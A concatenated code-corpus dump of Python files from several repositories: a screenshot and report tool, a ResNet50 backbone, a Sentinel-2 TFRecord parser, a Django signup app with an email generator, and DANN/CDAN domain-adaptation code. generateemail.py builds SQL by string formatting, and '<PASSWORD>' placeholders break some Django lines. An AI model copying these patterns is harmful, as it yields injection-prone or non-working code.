self.failed_sites[company_name].append(site.get_name())
p("\t放弃抓取页面")
except Exception as e:
self.failed_sites[company_name].append(site.get_name())
p("\t\t\t" + repr(e))
p("\t\t公司信息抓取完毕".format(company_name))
def append_taskbar(self, company_name: str, site: Site):
p("\t\t\t- 为页面截图添加任务栏")
screen_shot_path_page = site.get_screenshot_file_name_full(company_name,
SCREENSHOT_FILENAME_PAGE)
screen_shot_path_screen = site.get_screenshot_file_name_full(company_name,
SCREENSHOT_FILENAME_SCREEN)
page = Image.open(screen_shot_path_page)
screen = Image.open(screen_shot_path_screen)
taskbar_height = int(SCREENSHOT_PAGE_TASKBAR_HEIGHT * SCREENSHOT_PAGE_TASKBAR_RESIZE_FACTOR)
screen_width, screen_height = screen.size
taskbar_image = screen.crop(
(0, screen_height - taskbar_height, screen_width, screen_height))
page_width, page_height = page.size
resize_ratio = page_width / screen_width
taskbar_image = taskbar_image.resize((page_width, int(taskbar_height * resize_ratio)))
new_page = Image.new('RGBA', (page_width, page_height+taskbar_height))
new_page.paste(page)
new_page.paste(taskbar_image, (0, page_height))
new_page.save(screen_shot_path_page)
p("\t\t\t√ 添加完毕")
def generate_report(self, company_name: str):
p("\t\t开始生成报告".format(company_name))
try:
report = InspectionReport(company_name, self.get_sites())
report.generate()
report.save()
p("\t\t√ 报告生成完毕".format(company_name))
except Exception as e:
p("\t\t× 报告生成失败".format(company_name))
p("\t\t\t" + repr(e))
self.failed_reports.append(company_name)
def print_failed_summary(self):
p("=" * 20)
p("以下页面抓取失败:")
pprint(self.failed_sites)
p("以下报告生成失败:")
pprint(self.failed_reports)
```
#### File: NetInspectionHelper/src/util.py
```python
from config import DEBUG
def read_file(path: str) -> list:
with open(path, encoding='utf8') as file:
return file.readlines()
def p(s: str):
if (DEBUG):
print(s)
``` |
{
"source": "jnyborg/irn",
"score": 3
} |
#### File: irn/net/resnet50.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.model_zoo as model_zoo
model_urls = {
'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth'
}
class FixedBatchNorm(nn.BatchNorm2d):
def forward(self, input):
return F.batch_norm(input, self.running_mean, self.running_var, self.weight, self.bias,
training=False, eps=self.eps)
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None, dilation=1):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = FixedBatchNorm(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=dilation, bias=False, dilation=dilation)
self.bn2 = FixedBatchNorm(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.bn3 = FixedBatchNorm(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
self.dilation = dilation
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers, strides=(2, 2, 2, 2), dilations=(1, 1, 1, 1)):
self.inplanes = 64
super(ResNet, self).__init__()
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=strides[0], padding=3,
bias=False)
self.bn1 = FixedBatchNorm(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0], stride=1, dilation=dilations[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=strides[1], dilation=dilations[1])
self.layer3 = self._make_layer(block, 256, layers[2], stride=strides[2], dilation=dilations[2])
self.layer4 = self._make_layer(block, 512, layers[3], stride=strides[3], dilation=dilations[3])
self.inplanes = 1024
#self.avgpool = nn.AvgPool2d(7, stride=1)
#self.fc = nn.Linear(512 * block.expansion, 1000)
def _make_layer(self, block, planes, blocks, stride=1, dilation=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
FixedBatchNorm(planes * block.expansion),
)
layers = [block(self.inplanes, planes, stride, downsample, dilation=1)]
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, dilation=dilation))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x
def resnet50(pretrained=True, in_channels=3, **kwargs):
model = ResNet(Bottleneck, [3, 4, 6, 3], **kwargs)
if pretrained:
state_dict = model_zoo.load_url(model_urls['resnet50'])
state_dict.pop('fc.weight')
state_dict.pop('fc.bias')
model.load_state_dict(state_dict)
if in_channels != 3:
patch_first_conv(model, in_channels)
return model
# Thanks to https://github.com/qubvel/segmentation_models.pytorch/blob/master/segmentation_models_pytorch/encoders/_utils.py
def patch_first_conv(model, in_channels):
"""Change first convolution layer input channels.
In case:
in_channels == 1 or in_channels == 2 -> reuse original weights
in_channels > 3 -> make random kaiming normal initialization
"""
# get first conv
for module in model.modules():
if isinstance(module, nn.Conv2d):
break
# change input channels for first conv
module.in_channels = in_channels
weight = module.weight.detach()
reset = False
if in_channels == 1:
weight = weight.sum(1, keepdim=True)
elif in_channels == 2:
weight = weight[:, :2] * (3.0 / 2.0)
else:
reset = True
weight = torch.Tensor(
module.out_channels,
module.in_channels // module.groups,
*module.kernel_size
)
module.weight = nn.parameter.Parameter(weight)
if reset:
module.reset_parameters()
``` |
{
"source": "jnyborg/MTLCC",
"score": 3
} |
#### File: jnyborg/MTLCC/S2parser.py
```python
import tensorflow as tf
import numpy as np
import sys
import os
class S2parser():
""" defined the Sentinel 2 .tfrecord format """
def __init__(self):
self.feature_format = {
'x10/data': tf.FixedLenFeature([], tf.string),
'x10/shape': tf.FixedLenFeature([4], tf.int64),
'x20/data': tf.FixedLenFeature([], tf.string),
'x20/shape': tf.FixedLenFeature([4], tf.int64),
'x60/data': tf.FixedLenFeature([], tf.string),
'x60/shape': tf.FixedLenFeature([4], tf.int64),
'dates/doy': tf.FixedLenFeature([], tf.string),
'dates/year': tf.FixedLenFeature([], tf.string),
'dates/shape': tf.FixedLenFeature([1], tf.int64),
'labels/data': tf.FixedLenFeature([], tf.string),
'labels/shape': tf.FixedLenFeature([2], tf.int64)
}
return None
def write(self, filename, x10, x20, x60, doy, year, labels):
# https://stackoverflow.com/questions/39524323/tf-sequenceexample-with-multidimensional-arrays
writer = tf.python_io.TFRecordWriter(filename)
# Changed from 64bit to smaller sizes
x10 = x10.astype(np.uint16)
x20 = x20.astype(np.uint16)
x60 = x60.astype(np.uint16)
doy = doy.astype(np.uint16)
year = year.astype(np.uint16)
labels = labels.astype(np.uint8)
# Create a write feature
feature = {
'x10/data': tf.train.Feature(bytes_list=tf.train.BytesList(value=[x10.tobytes()])),
'x10/shape': tf.train.Feature(int64_list=tf.train.Int64List(value=x10.shape)),
'x20/data': tf.train.Feature(bytes_list=tf.train.BytesList(value=[x20.tobytes()])),
'x20/shape': tf.train.Feature(int64_list=tf.train.Int64List(value=x20.shape)),
'x60/data': tf.train.Feature(bytes_list=tf.train.BytesList(value=[x60.tobytes()])),
'x60/shape': tf.train.Feature(int64_list=tf.train.Int64List(value=x60.shape)),
'labels/data': tf.train.Feature(bytes_list=tf.train.BytesList(value=[labels.tobytes()])),
'labels/shape': tf.train.Feature(int64_list=tf.train.Int64List(value=labels.shape)),
'dates/doy': tf.train.Feature(bytes_list=tf.train.BytesList(value=[doy.tobytes()])),
'dates/year': tf.train.Feature(bytes_list=tf.train.BytesList(value=[year.tobytes()])),
'dates/shape': tf.train.Feature(int64_list=tf.train.Int64List(value=doy.shape))
}
example = tf.train.Example(features=tf.train.Features(feature=feature))
writer.write(example.SerializeToString())
writer.close()
sys.stdout.flush()
def parse_example(self, serialized_example):
"""
example proto can be obtained via
filename_queue = tf.train.string_input_producer(filenames, num_epochs=None)
or by passing this function in dataset.map(.)
"""
feature = tf.parse_single_example(serialized_example, self.feature_format)
# decode and reshape x10
x10 = tf.reshape(tf.decode_raw(feature['x10/data'], tf.uint16), tf.cast(feature['x10/shape'], tf.int32))
x20 = tf.reshape(tf.decode_raw(feature['x20/data'], tf.uint16), tf.cast(feature['x20/shape'], tf.int32))
x60 = tf.reshape(tf.decode_raw(feature['x60/data'], tf.uint16), tf.cast(feature['x60/shape'], tf.int32))
doy = tf.reshape(tf.decode_raw(feature['dates/doy'], tf.uint16), tf.cast(feature['dates/shape'], tf.int32))
year = tf.reshape(tf.decode_raw(feature['dates/year'], tf.uint16), tf.cast(feature['dates/shape'], tf.int32))
labels = tf.reshape(tf.decode_raw(feature['labels/data'], tf.uint8), tf.cast(feature['labels/shape'], tf.int32))
return x10, x20, x60, doy, year, labels
def test():
print "Running self test:"
print "temporary tfrecord file is written with random numbers"
print "tfrecord file is read back"
print "contents are compared"
filename = "tmptile.tfrecord"
# create dummy dataset
x10 = (np.random.rand(5, 24, 24, 4) * 1e3).astype(np.uint16)
x20 = (np.random.rand(5, 12, 12, 4) * 1e3).astype(np.uint16)
x60 = (np.random.rand(5, 4, 4, 3) * 1e3).astype(np.uint16)
labels = (np.random.rand(24, 24)).astype(np.uint8)
doy = (np.random.rand(5) * 1e3).astype(np.uint16)
year = (np.random.rand(5) * 1e3).astype(np.uint16)
# init parser
parser = S2parser()
parser.write(filename, x10, x20, x60, doy, year, labels)
tf_record_file_queue = tf.train.string_input_producer([filename])
reader = tf.TFRecordReader()
_, s = reader.read(tf_record_file_queue)
x10_, x20_, x60_, doy_, year_, labels_ = parser.parse_example(s)
with tf.Session() as sess:
tf.global_variables_initializer()
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
x10_, x20_, x60_, doy_, year_, labels_ = sess.run([x10_, x20_, x60_, doy_, year_, labels_ ])
if np.all(x10_ == x10) and np.all(x20_ == x20) and np.all(x60_ == x60) and np.all(labels_ == labels) and np.all(
doy_ == doy) and np.all(year_ == year):
print "PASSED"
else:
print "NOT PASSED"
os.remove(filename)
if __name__ == '__main__':
test()
``` |
{
"source": "jnyborg/nospammail",
"score": 2
} |
#### File: backend/login/forms.py
```python
from django.forms import EmailField, forms
from django.utils.translation import ugettext_lazy as _
from django.core.exceptions import ValidationError
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
class UserCreationForm(UserCreationForm):
email = EmailField(label=_("Email address"), required=True)
class Meta:
model = User
fields = ("username", "email", "<PASSWORD>", "<PASSWORD>")
def clean(self):
cleaned_data = super(UserCreationForm, self).clean()
if cleaned_data.get("email"):
email = cleaned_data["email"]
if "@nospammail.org" in email:
raise ValidationError("You cannot register using a nospammail address.")
elif User.objects.filter(email=email).exists():
raise forms.ValidationError("A user with that email address already exists.")
return cleaned_data
def save(self, commit=True):
user = super(UserCreationForm, self).save(commit=False)
if commit:
user.save()
return user
```
#### File: backend/login/views.py
```python
from django.contrib.auth import login, authenticate
from django.shortcuts import render, redirect
from login.forms import UserCreationForm
from django.http import HttpResponse
from nospammail.urls import anonymous_required
from http import HTTPStatus
@anonymous_required(custom_redirect=HttpResponse("You are already signed in, please sign out and try again.", status=HTTPStatus.UNAUTHORIZED))
def signup(request):
if request.method == 'POST':
form = UserCreationForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
raw_password = form.cleaned_data.get('<PASSWORD>')
user = authenticate(username=username, password=<PASSWORD>)
login(request, user)
return redirect('/')
else:
form = UserCreationForm()
return render(request, 'registration/signup.html', {'form': form})
```
#### File: backend/settings_console/generateemail.py
```python
import string
import random
import psycopg2
import os
def __generatePrefix():
allowedCharacters = string.ascii_lowercase + "".join(map(str, range(10)))
tempEmail = ""
for num in range(10):
tempEmail += allowedCharacters[random.randint(0, len(allowedCharacters) - 1)]
return tempEmail + "@nospammail.org"
def __emailIsUnique(email):
try:
conn = psycopg2.connect("dbname='nospammail' " \
"user='nospammail' " \
"host='{}'" \
"password='{}'".format(
os.environ.get('NOSPAMMAIL_HOST', False),
os.environ.get('NOSPAMMAIL_PW', False)))
cur = conn.cursor()
cur.execute("select * from settings_console_generatedemail as g where g.email='{}';".format(email))
rows = cur.fetchall()
return len(rows) <= 0
except Exception as e:
print("Unable to connect to DB: %s: %s" % e.errno, e.strerror)
return False
def generateRandomEmail():
newEmail = __generatePrefix()
while not __emailIsUnique(newEmail):
#print("Email {} was not uinque!".format(newEmail))
newEmail = __generatePrefix()
return newEmail
if __name__ == "__main__":
print(generateRandomEmail())
``` |
{
"source": "jnyborg/timematch",
"score": 2
} |
#### File: competitors/dann/dann.py
```python
import torch
import torch.nn as nn
from torch.optim.lr_scheduler import LambdaLR
from torch.optim.sgd import SGD
from torchvision import transforms
from tqdm import tqdm
from dataset import PixelSetData
from evaluation import validation
from transforms import Normalize, RandomSamplePixels, RandomSampleTimeSteps, ToTensor, RandomTemporalShift, Identity
from utils.metrics import accuracy
from utils.train_utils import AverageMeter, cycle, to_cuda, cat_samples
from typing import List, Dict, Optional
import torch.nn as nn
import torch.nn.functional as F
from competitors.dann.grl import WarmStartGradientReverseLayer
import numpy as np
def train_dann(
model, config, writer, val_loader, device, best_model_path, fold_num, splits
):
source_loader, target_loader = get_data_loaders(splits, config)
if config.weights is not None:
pretrained_path = f"{config.weights}/fold_{fold_num}"
pretrained_weights = torch.load(f"{pretrained_path}/model.pt")["state_dict"]
model.load_state_dict(pretrained_weights)
features_dim = 128
hidden_size = 1024
if config.adv_loss == "DANN":
domain_discri = DomainDiscriminator(features_dim, hidden_size=hidden_size).to(
device
)
domain_adv = DomainAdversarialLoss(domain_discri).to(device)
elif config.adv_loss in ["CDAN", "CDAN+E"]:
use_entropy = config.adv_loss == "CDAN+E"
use_randomized = features_dim * config.num_classes > 4096
randomized_dim = 1024
if use_randomized:
domain_discri = DomainDiscriminator(
randomized_dim, hidden_size=hidden_size
).to(device)
else:
domain_discri = DomainDiscriminator(
features_dim * config.num_classes, hidden_size=hidden_size
).to(device)
domain_adv = ConditionalDomainAdversarialLoss(
domain_discri,
entropy_conditioning=use_entropy,
num_classes=config.num_classes,
features_dim=features_dim,
randomized=use_randomized,
randomized_dim=randomized_dim,
).to(device)
else:
raise NotImplementedError
if config.use_default_optim:
base_lr = 1.0
classifier_params = [
{"params": model.spatial_encoder.parameters(), "lr": 0.1 * base_lr},
{"params": model.temporal_encoder.parameters(), "lr": 0.1 * base_lr},
{"params": model.decoder.parameters(), "lr": 1.0 * base_lr},
]
lr_gamma = 0.001
lr_decay = 0.75
optimizer = SGD(
classifier_params + domain_discri.get_parameters(),
config.lr,
momentum=0.9,
weight_decay=config.weight_decay,
nesterov=True,
)
lr_scheduler = LambdaLR(
optimizer, lambda x: config.lr * (1.0 + lr_gamma * float(x)) ** (-lr_decay)
)
else:
optimizer = torch.optim.Adam(
list(model.parameters()) + list(domain_discri.parameters()),
lr=config.lr,
weight_decay=config.weight_decay,
)
lr_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(
optimizer, T_max=config.epochs * config.steps_per_epoch, eta_min=0
)
## train
best_f1 = 0.0
criterion = nn.CrossEntropyLoss()
global_step = 0
source_iter = iter(cycle(source_loader))
target_iter = iter(cycle(target_loader))
for epoch in range(config.epochs):
progress_bar = tqdm(
range(config.steps_per_epoch),
desc=f"{config.adv_loss} Epoch {epoch + 1}/{config.epochs}",
)
losses = AverageMeter()
class_accs = AverageMeter()
domain_accs = AverageMeter()
model.train()
domain_adv.train()
for _ in progress_bar:
x_s, x_t = next(source_iter), next(target_iter)
labels_s = x_s["label"].cuda()
x = cat_samples([x_s, x_t])
y, f = model(*to_cuda(x, device), return_feats=True)
y_s, y_t = y.chunk(2, dim=0)
f_s, f_t = f.chunk(2, dim=0)
cls_loss = criterion(y_s, labels_s)
if config.adv_loss == "DANN":
transfer_loss = domain_adv(f_s, f_t)
else:
transfer_loss = domain_adv(y_s, f_s, y_t, f_t)
domain_acc = domain_adv.domain_discriminator_accuracy
loss = cls_loss + transfer_loss * config.trade_off
optimizer.zero_grad()
loss.backward()
optimizer.step()
lr_scheduler.step()
losses.update(loss.item(), config.batch_size)
class_accs.update(accuracy(y_s, labels_s), config.batch_size)
domain_accs.update(domain_acc, config.batch_size)
progress_bar.set_postfix(
loss=f"{losses.avg:.3f}",
class_acc=f"{class_accs.avg:.2f}",
domain_acc=f"{domain_accs.avg:.2f}",
)
if global_step % config.log_step == 0:
writer.add_scalar("train/loss", losses.val, global_step)
writer.add_scalar("train/accuracy", class_accs.val, global_step)
writer.add_scalar(
"train/lr", optimizer.param_groups[0]["lr"], global_step
)
global_step += 1
progress_bar.close()
model.eval()
best_f1 = validation(
best_f1, None, config, criterion, device, epoch, model, val_loader, writer
)
# save final model and use for evaluation
torch.save({"state_dict": model.state_dict()}, best_model_path)
def get_data_loaders(splits, config):
def create_data_loader(dataset):
return torch.utils.data.DataLoader(
dataset,
num_workers=config.num_workers,
pin_memory=True,
batch_size=config.batch_size,
shuffle=True,
drop_last=True,
)
train_transform = transforms.Compose(
[
RandomSamplePixels(config.num_pixels),
RandomSampleTimeSteps(config.seq_length),
RandomTemporalShift(max_shift=config.max_shift_aug, p=config.shift_aug_p) if config.with_shift_aug else Identity(),
Normalize(),
ToTensor(),
]
)
source_dataset = PixelSetData(
config.data_root,
config.source,
config.classes,
train_transform,
indices=splits[config.source]["train"],
)
source_loader = create_data_loader(source_dataset)
target_dataset = PixelSetData(
config.data_root,
config.target,
config.classes,
train_transform,
indices=splits[config.target]["train"],
)
target_loader = create_data_loader(target_dataset)
print(
f"size of source dataset: {len(source_dataset)} ({len(source_loader)} batches)"
)
print(
f"size of target dataset: {len(target_dataset)} ({len(target_loader)} batches)"
)
return source_loader, target_loader
class DomainDiscriminator(nn.Sequential):
r"""Domain discriminator model from
`"Domain-Adversarial Training of Neural Networks" (ICML 2015) <https://arxiv.org/abs/1505.07818>`_
Distinguish whether the input features come from the source domain or the target domain.
The source domain label is 1 and the target domain label is 0.
Args:
in_feature (int): dimension of the input feature
hidden_size (int): dimension of the hidden features
batch_norm (bool): whether use :class:`~torch.nn.BatchNorm1d`.
Use :class:`~torch.nn.Dropout` if ``batch_norm`` is False. Default: True.
Shape:
- Inputs: (minibatch, `in_feature`)
- Outputs: :math:`(minibatch, 1)`
"""
def __init__(self, in_feature: int, hidden_size: int, batch_norm=True):
if batch_norm:
super(DomainDiscriminator, self).__init__(
nn.Linear(in_feature, hidden_size),
nn.BatchNorm1d(hidden_size),
nn.ReLU(),
nn.Linear(hidden_size, hidden_size),
nn.BatchNorm1d(hidden_size),
nn.ReLU(),
nn.Linear(hidden_size, 1),
nn.Sigmoid(),
)
else:
super(DomainDiscriminator, self).__init__(
nn.Linear(in_feature, hidden_size),
nn.ReLU(inplace=True),
nn.Dropout(0.5),
nn.Linear(hidden_size, hidden_size),
nn.ReLU(inplace=True),
nn.Dropout(0.5),
nn.Linear(hidden_size, 1),
nn.Sigmoid(),
)
def get_parameters(self) -> List[Dict]:
return [{"params": self.parameters(), "lr": 1.0}]
class DomainAdversarialLoss(nn.Module):
"""
The Domain Adversarial Loss proposed in
`Domain-Adversarial Training of Neural Networks (ICML 2015) <https://arxiv.org/abs/1505.07818>`_
Domain adversarial loss measures the domain discrepancy through training a domain discriminator.
Given domain discriminator :math:`D`, feature representation :math:`f`, the definition of DANN loss is
.. math::
loss(\mathcal{D}_s, \mathcal{D}_t) = \mathbb{E}_{x_i^s \sim \mathcal{D}_s} log[D(f_i^s)]
+ \mathbb{E}_{x_j^t \sim \mathcal{D}_t} log[1-D(f_j^t)].
Args:
domain_discriminator (torch.nn.Module): A domain discriminator object, which predicts the domains of features. Its input shape is (N, F) and output shape is (N, 1)
reduction (str, optional): Specifies the reduction to apply to the output:
``'none'`` | ``'mean'`` | ``'sum'``. ``'none'``: no reduction will be applied,
``'mean'``: the sum of the output will be divided by the number of
elements in the output, ``'sum'``: the output will be summed. Default: ``'mean'``
grl (WarmStartGradientReverseLayer, optional): Default: None.
Inputs:
- f_s (tensor): feature representations on source domain, :math:`f^s`
- f_t (tensor): feature representations on target domain, :math:`f^t`
- w_s (tensor, optional): a rescaling weight given to each instance from source domain.
- w_t (tensor, optional): a rescaling weight given to each instance from target domain.
Shape:
- f_s, f_t: :math:`(N, F)` where F means the dimension of input features.
- Outputs: scalar by default. If :attr:`reduction` is ``'none'``, then :math:`(N, )`.
Examples::
>>> from dalib.modules.domain_discriminator import DomainDiscriminator
>>> discriminator = DomainDiscriminator(in_feature=1024, hidden_size=1024)
>>> loss = DomainAdversarialLoss(discriminator, reduction='mean')
>>> # features from source domain and target domain
>>> f_s, f_t = torch.randn(20, 1024), torch.randn(20, 1024)
>>> # If you want to assign different weights to each instance, you should pass in w_s and w_t
>>> w_s, w_t = torch.randn(20), torch.randn(20)
>>> output = loss(f_s, f_t, w_s, w_t)
"""
def __init__(
self,
domain_discriminator: nn.Module,
reduction: Optional[str] = "mean",
grl: Optional = None,
):
super(DomainAdversarialLoss, self).__init__()
self.grl = (
WarmStartGradientReverseLayer(
alpha=1.0, lo=0.0, hi=1.0, max_iters=1000, auto_step=True
)
if grl is None
else grl
)
self.domain_discriminator = domain_discriminator
self.bce = lambda input, target, weight: F.binary_cross_entropy(
input, target, weight=weight, reduction=reduction
)
self.domain_discriminator_accuracy = None
def forward(
self,
f_s: torch.Tensor,
f_t: torch.Tensor,
w_s: Optional[torch.Tensor] = None,
w_t: Optional[torch.Tensor] = None,
) -> torch.Tensor:
f = self.grl(torch.cat((f_s, f_t), dim=0))
d = self.domain_discriminator(f)
d_s, d_t = d.chunk(2, dim=0)
d_label_s = torch.ones((f_s.size(0), 1)).to(f_s.device)
d_label_t = torch.zeros((f_t.size(0), 1)).to(f_t.device)
self.domain_discriminator_accuracy = 0.5 * (
binary_accuracy(d_s, d_label_s) + binary_accuracy(d_t, d_label_t)
)
if w_s is None:
w_s = torch.ones_like(d_label_s)
if w_t is None:
w_t = torch.ones_like(d_label_t)
return 0.5 * (
self.bce(d_s, d_label_s, w_s.view_as(d_s))
+ self.bce(d_t, d_label_t, w_t.view_as(d_t))
)
def binary_accuracy(output: torch.Tensor, target: torch.Tensor) -> float:
"""Computes the accuracy for binary classification"""
with torch.no_grad():
batch_size = target.size(0)
pred = (output >= 0.5).float().t().view(-1)
correct = pred.eq(target.view(-1)).float().sum()
correct.mul_(100.0 / batch_size)
return correct
class ConditionalDomainAdversarialLoss(nn.Module):
r"""The Conditional Domain Adversarial Loss used in `Conditional Adversarial Domain Adaptation (NIPS 2018) <https://arxiv.org/abs/1705.10667>`_
Conditional Domain adversarial loss measures the domain discrepancy through training a domain discriminator in a
conditional manner. Given domain discriminator :math:`D`, feature representation :math:`f` and
classifier predictions :math:`g`, the definition of CDAN loss is
.. math::
loss(\mathcal{D}_s, \mathcal{D}_t) &= \mathbb{E}_{x_i^s \sim \mathcal{D}_s} log[D(T(f_i^s, g_i^s))] \\
&+ \mathbb{E}_{x_j^t \sim \mathcal{D}_t} log[1-D(T(f_j^t, g_j^t))],\\
where :math:`T` is a :class:`MultiLinearMap` or :class:`RandomizedMultiLinearMap` which convert two tensors to a single tensor.
Args:
domain_discriminator (torch.nn.Module): A domain discriminator object, which predicts the domains of
features. Its input shape is (N, F) and output shape is (N, 1)
entropy_conditioning (bool, optional): If True, use entropy-aware weight to reweight each training example.
Default: False
randomized (bool, optional): If True, use `randomized multi linear map`. Else, use `multi linear map`.
Default: False
num_classes (int, optional): Number of classes. Default: -1
features_dim (int, optional): Dimension of input features. Default: -1
randomized_dim (int, optional): Dimension of features after randomized. Default: 1024
reduction (str, optional): Specifies the reduction to apply to the output:
``'none'`` | ``'mean'`` | ``'sum'``. ``'none'``: no reduction will be applied,
``'mean'``: the sum of the output will be divided by the number of
elements in the output, ``'sum'``: the output will be summed. Default: ``'mean'``
.. note::
You need to provide `num_classes`, `features_dim` and `randomized_dim` **only when** `randomized`
is set True.
Inputs:
- g_s (tensor): unnormalized classifier predictions on source domain, :math:`g^s`
- f_s (tensor): feature representations on source domain, :math:`f^s`
- g_t (tensor): unnormalized classifier predictions on target domain, :math:`g^t`
- f_t (tensor): feature representations on target domain, :math:`f^t`
Shape:
- g_s, g_t: :math:`(minibatch, C)` where C means the number of classes.
- f_s, f_t: :math:`(minibatch, F)` where F means the dimension of input features.
- Output: scalar by default. If :attr:`reduction` is ``'none'``, then :math:`(minibatch, )`.
Examples::
>>> from dalib.modules.domain_discriminator import DomainDiscriminator
>>> from dalib.adaptation.cdan import ConditionalDomainAdversarialLoss
>>> import torch
>>> num_classes = 2
>>> feature_dim = 1024
>>> batch_size = 10
>>> discriminator = DomainDiscriminator(in_feature=feature_dim * num_classes, hidden_size=1024)
>>> loss = ConditionalDomainAdversarialLoss(discriminator, reduction='mean')
>>> # features from source domain and target domain
>>> f_s, f_t = torch.randn(batch_size, feature_dim), torch.randn(batch_size, feature_dim)
>>> # logits output from source domain adn target domain
>>> g_s, g_t = torch.randn(batch_size, num_classes), torch.randn(batch_size, num_classes)
>>> output = loss(g_s, f_s, g_t, f_t)
"""
def __init__(
self,
domain_discriminator: nn.Module,
entropy_conditioning: Optional[bool] = False,
randomized: Optional[bool] = False,
num_classes: Optional[int] = -1,
features_dim: Optional[int] = -1,
randomized_dim: Optional[int] = 1024,
reduction: Optional[str] = "mean",
):
super(ConditionalDomainAdversarialLoss, self).__init__()
self.domain_discriminator = domain_discriminator
self.grl = WarmStartGradientReverseLayer(
alpha=1.0, lo=0.0, hi=1.0, max_iters=1000, auto_step=True
)
self.entropy_conditioning = entropy_conditioning
if randomized:
assert num_classes > 0 and features_dim > 0 and randomized_dim > 0
self.map = RandomizedMultiLinearMap(
features_dim, num_classes, randomized_dim
)
else:
self.map = MultiLinearMap()
self.bce = (
lambda input, target, weight: F.binary_cross_entropy(
input, target, weight, reduction=reduction
)
if self.entropy_conditioning
else F.binary_cross_entropy(input, target, reduction=reduction)
)
self.domain_discriminator_accuracy = None
def forward(
self, g_s: torch.Tensor, f_s: torch.Tensor, g_t: torch.Tensor, f_t: torch.Tensor
) -> torch.Tensor:
f = torch.cat((f_s, f_t), dim=0)
g = torch.cat((g_s, g_t), dim=0)
g = F.softmax(g, dim=1).detach()
h = self.grl(self.map(f, g))
d = self.domain_discriminator(h)
d_label = torch.cat(
(
torch.ones((g_s.size(0), 1)).to(g_s.device),
torch.zeros((g_t.size(0), 1)).to(g_t.device),
)
)
weight = 1.0 + torch.exp(-entropy(g))
batch_size = f.size(0)
weight = weight / torch.sum(weight) * batch_size
self.domain_discriminator_accuracy = binary_accuracy(d, d_label)
return self.bce(d, d_label, weight.view_as(d))
class RandomizedMultiLinearMap(nn.Module):
"""Random multi linear map
Given two inputs :math:`f` and :math:`g`, the definition is
.. math::
T_{\odot}(f,g) = \dfrac{1}{\sqrt{d}} (R_f f) \odot (R_g g),
where :math:`\odot` is element-wise product, :math:`R_f` and :math:`R_g` are random matrices
sampled only once and fixed in training.
Args:
features_dim (int): dimension of input :math:`f`
num_classes (int): dimension of input :math:`g`
output_dim (int, optional): dimension of output tensor. Default: 1024
Shape:
- f: (minibatch, features_dim)
- g: (minibatch, num_classes)
- Outputs: (minibatch, output_dim)
"""
def __init__(
self, features_dim: int, num_classes: int, output_dim: Optional[int] = 1024
):
super(RandomizedMultiLinearMap, self).__init__()
self.Rf = torch.randn(features_dim, output_dim)
self.Rg = torch.randn(num_classes, output_dim)
self.output_dim = output_dim
def forward(self, f: torch.Tensor, g: torch.Tensor) -> torch.Tensor:
f = torch.mm(f, self.Rf.to(f.device))
g = torch.mm(g, self.Rg.to(g.device))
output = torch.mul(f, g) / np.sqrt(float(self.output_dim))
return output
class MultiLinearMap(nn.Module):
"""Multi linear map
Shape:
- f: (minibatch, F)
- g: (minibatch, C)
- Outputs: (minibatch, F * C)
"""
def __init__(self):
super(MultiLinearMap, self).__init__()
def forward(self, f: torch.Tensor, g: torch.Tensor) -> torch.Tensor:
batch_size = f.size(0)
output = torch.bmm(g.unsqueeze(2), f.unsqueeze(1))
return output.view(batch_size, -1)
def entropy(predictions: torch.Tensor, reduction="none") -> torch.Tensor:
r"""Entropy of prediction.
The definition is:
.. math::
entropy(p) = - \sum_{c=1}^C p_c \log p_c
where C is number of classes.
Args:
predictions (tensor): Classifier predictions. Expected to contain raw, normalized scores for each class
reduction (str, optional): Specifies the reduction to apply to the output:
``'none'`` | ``'mean'``. ``'none'``: no reduction will be applied,
``'mean'``: the sum of the output will be divided by the number of
elements in the output. Default: ``'mean'``
Shape:
- predictions: :math:`(minibatch, C)` where C means the number of classes.
- Output: :math:`(minibatch, )` by default. If :attr:`reduction` is ``'mean'``, then scalar.
"""
epsilon = 1e-5
H = -predictions * torch.log(predictions + epsilon)
H = H.sum(dim=1)
if reduction == "mean":
return H.mean()
else:
return H
```
#### File: competitors/mmd/train_mmd.py
```python
import torch
import torch.nn as nn
from torch.optim.lr_scheduler import LambdaLR
from torch.optim.sgd import SGD
from torchvision import transforms
from tqdm import tqdm
from competitors.mmd.dan import MultipleKernelMaximumMeanDiscrepancy
from competitors.mmd.kernels import GaussianKernel
from dataset import PixelSetData
from evaluation import validation
from transforms import Normalize, RandomSamplePixels, RandomSampleTimeSteps, ToTensor, RandomTemporalShift, Identity
from utils.train_utils import AverageMeter, cat_samples, cycle, to_cuda
from utils.metrics import accuracy
